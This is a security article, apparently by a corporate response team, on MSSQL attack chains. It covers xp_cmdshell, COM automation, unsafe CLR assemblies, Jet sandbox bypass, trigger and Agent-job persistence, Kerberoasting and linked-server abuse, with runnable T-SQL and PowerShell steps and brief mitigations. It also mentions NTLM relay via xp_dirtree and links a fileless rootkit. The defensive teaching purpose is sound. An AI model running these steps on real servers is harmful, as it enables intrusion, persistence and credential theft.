BestHub
Sign in
Information Security 19 min read

Uncovering MSSQL Attack Chains: Stored Procedures, COM, CLR, Triggers, and Lateral Movement

This article provides a comprehensive technical analysis of MSSQL attack vectors—including vulnerable stored procedures, COM automation, CLR exploitation, sandbox bypass, trigger abuse, proxy jobs, Kerberoasting, and linked servers—detailing prerequisites, step‑by‑step T‑SQL examples, mitigation recommendations, and overall impact on database security.

Huolala Safety Emergency Response Center
Huolala Safety Emergency Response Center
Huolala Safety Emergency Response Center
Uncovering MSSQL Attack Chains: Stored Procedures, COM, CLR, Triggers, and Lateral Movement

Privilege Escalation via Stored Procedures

Prerequisites: DBA privileges and the target stored‑procedure DLL must be present.

Overview: Stored procedures run with the owner’s privileges. High‑privilege procedures such as xp_cmdshell can execute system commands. If disabled, attackers may re‑register the procedure with a custom DLL.

Enable xp_cmdshell (if allowed):

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Check existence:

SELECT COUNT(*) FROM master.dbo.sysobjects WHERE xtype = 'x' AND name = 'xp_cmdshell';

Re‑register a missing procedure:

EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'c:\\xplog70.dll';

Other dangerous extended procedures include xp_regwrite, xp_regread, xp_dirtree, xp_subdirs.

Mitigation: Revoke execution rights for all users except dbo, disable or delete the procedures, and remove PUBLIC permissions on any remaining extended procedures.

COM Automation Procedures

Prerequisites: DBA privileges and the required OLE component.

Overview: sp_oacreate and sp_oamethod allow creation of COM objects and invocation of their methods, enabling command execution.

Write output to a file:

DECLARE @shell INT;
EXEC sp_oacreate 'wscript.shell', @shell OUTPUT;
EXEC sp_oamethod @shell, 'run', NULL, 'c:\\windows\\system32\\cmd.exe /c whoami > c:\\test.txt';

Capture command output directly:

DECLARE @obj INT, @obj2 INT, @obj3 INT, @out VARCHAR(8000);
EXEC sp_OACreate 'WScript.Shell', @obj OUTPUT;
EXEC sp_OAMethod @obj, 'exec', @obj2 OUTPUT, 'C:\\Windows\\System32\\cmd.exe /c whoami';
EXEC sp_OAMethod @obj2, 'StdOut', @obj3 OUTPUT;
EXEC sp_OAMethod @obj3, 'ReadAll', @out OUTPUT;
SELECT @out;

Mitigation: Disable OLE automation procedures, allow only verified COM components, and restrict PUBLIC execution rights.

CLR Exploitation

Prerequisites: DBA privileges, matching MSSQL and .NET versions, and the database marked TRUSTWORTHY.

Overview: Enabling CLR permits execution of arbitrary C# code inside the database. Attackers can load unsafe assemblies as stored procedures and run commands without writing files to disk.

Enable CLR and create an unsafe assembly:

EXEC sp_configure 'show advanced options',1; RECONFIGURE;
EXEC sp_configure 'clr enabled',1; RECONFIGURE;
ALTER DATABASE master SET TRUSTWORTHY ON;
CREATE ASSEMBLY UserDefinedClrAssembly FROM 0x... WITH PERMISSION_SET = UNSAFE;
CREATE PROCEDURE dbo.ExecCommand @cmd NVARCHAR(MAX) AS EXTERNAL NAME UserDefinedClrAssembly.StoredProcedures.ExecCommand;
EXEC dbo.ExecCommand 'whoami /all';

Tool example: https://github.com/EPICROUTERSS/MSSQL-Fileless-Rootkit-WarSQLKit

Mitigation: Avoid loading unsafe assemblies, enforce signed assemblies, and disable CLR when not required.

Sandbox Mode Bypass (Access)

Prerequisites: Jet OLEDB driver, DBA privileges, and ability to use xp_regwrite.

Overview: The Access sandbox blocks dangerous functions. By setting the registry key SandBoxMode to 0, the sandbox is disabled and the shell function in an MDB file can execute commands.

Disable sandbox and run a command via OpenRowset:

EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Jet\\4.0\\Engines','SandBoxMode','REG_DWORD',0;
EXEC sp_configure 'show advanced options',1; RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries',1; RECONFIGURE;
SELECT * FROM OpenRowset('Microsoft.Jet.OLEDB.4.0',';Database=c:\\windows\\system32\\ias\\ias.mdb','SELECT shell("net user > c\\test.txt")');

Mitigation: Remove MDB files, disable the Jet driver, and revoke xp_regwrite permissions.

Persistence Mechanisms

Triggers

Prerequisite: High‑privilege account capable of creating server‑level triggers.

Overview: Triggers run T‑SQL after specific events. A login trigger can execute xp_cmdshell each time a privileged account logs in.

Login trigger example:

CREATE TRIGGER test ON ALL SERVER FOR LOGON AS
BEGIN
    IF ORIGINAL_LOGIN() = 'sa'
    BEGIN
        EXEC xp_cmdshell 'whoami > c:\\whoami.txt';
    END
END;
GO

Mitigation: Restrict trigger creation to trusted principals, use signed modules, and limit external connections.

Proxy Jobs

Prerequisites: SQL Agent enabled, CLR enabled, trusted database, and permission to create jobs.

Overview: SQL Agent proxy jobs can run OS commands via CmdExec or PowerShell steps, providing a stealthy persistence channel.

Job creation example (CmdExec):

EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT';
USE msdb;
EXEC sp_add_job 'myjob';
EXEC sp_add_jobstep NULL,'myjob',NULL,'1','CmdExec','cmd.exe /c \"whoami > C:\\whoami.txt\"';
EXEC sp_add_jobserver NULL,'myjob',@@SERVERNAME;
EXEC sp_start_job 'myjob';

Mitigation: Disable CLR, restrict job access to external resources, and run jobs under low‑privilege service accounts.

Lateral Movement

Kerberoasting MSSQL SPNs

Prerequisites: MSSQL service registered with an SPN under a domain account and RC4 encryption.

Overview: Attackers request service tickets for the SPN, extract the NTLM hash, and brute‑force it (e.g., with Hashcat). Compromised credentials can be used for further privilege escalation.

Enumeration and hash extraction example:

setspn -T ignite -Q */*
Import-Module .\\GetUserSPNs.ps1
Import-Module .\\PowerView.ps1
Get-NetUser -SPN
Import-Module .\\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat

Mitigation: Use stronger encryption (AES) and avoid unnecessary SPN registration for MSSQL.

Linked Servers (SqlLink)

Prerequisite: A linked server is configured.

Overview: Linked servers allow cross‑database queries. If the linked server trusts local credentials, attackers can execute remote commands via xp_cmdshell or run arbitrary T‑SQL using EXEC(... ) AT.

Remote command execution example:

EXECUTE AS LOGIN = 'username';
EXEC ('sp_configure ''show advanced options'',1; RECONFIGURE;') AT linkname;
EXEC ('sp_configure ''xp_cmdshell'',1; RECONFIGURE;') AT linkname;
EXEC ('xp_cmdshell ''whoami'';') AT linkname;

In a domain environment, NTLM relay attacks can be performed by triggering xp_dirtree on a UNC path and capturing the hash with ntlmrelayx from Impacket:

SELECT 1 FROM openquery('sqllinked-hostname','SELECT 1; EXEC master..xp_dirtree ''\\\\UNC\\share''');

Mitigation: Disable linked servers, restrict permissions on linked servers, and monitor for unusual remote queries.

securityMSSQLStored ProcedureCLRAttack ChainCOM Automation
Huolala Safety Emergency Response Center
Written by

Huolala Safety Emergency Response Center

Official public account of the Huolala Safety Emergency Response Center (LLSRC)

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment